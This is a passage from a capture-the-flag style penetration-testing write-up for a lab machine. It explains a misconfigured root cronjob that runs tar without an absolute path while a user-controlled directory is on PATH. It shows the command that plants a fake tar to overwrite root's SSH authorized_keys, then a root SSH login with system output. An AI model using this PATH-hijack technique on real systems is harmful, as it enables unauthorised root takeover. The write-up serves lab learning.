Misconfigured Cronjob
The root cronjob process is executing a Bash script that sets the /home/alfredo/restapi directory into the PATH variable and performs an archiving operating using tar without its absolute path. Given the /home/alfredo/restapi directory is controlled by the current user, alfredo, and the tar executable is called without its absolute path, code execution is achievable by placing a malicious tar executable into the /home/alfredo/restapi directory.
[alfredo@fedora ~]$ echo 'cp /home/alfredo/.ssh/authorized_keys /root/.ssh/authorized_keys' > /home/alfredo/restapi/tar ; chmod 777 /home/alfredo/restapi/tarThe command above will create a tar “executable” that overwrites the SSH authorized_keys file of the root account
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ ssh root@$IP -p 25022 -i ./id_rsa.alfredo
Web console: https://fedora:9090/
Last login: Tue Mar 28 03:21:22 2023
[root@fedora ~]# whoami
root
[root@fedora ~]# hostname
fedora
[root@fedora ~]# ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.120.249 netmask 255.255.255.0 broadcast 192.168.120.255
inet6 fe80::c03e:6487:9234:9f8b prefixlen 64 scopeid 0x20<link>
ether 00:50:56:9e:08:27 txqueuelen 1000 (Ethernet)
RX packets 8413 bytes 4544887 (4.3 MiB)
RX errors 0 dropped 100 overruns 0 frame 0
TX packets 4314 bytes 646275 (631.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 20 bytes 1120 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1120 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System level compromise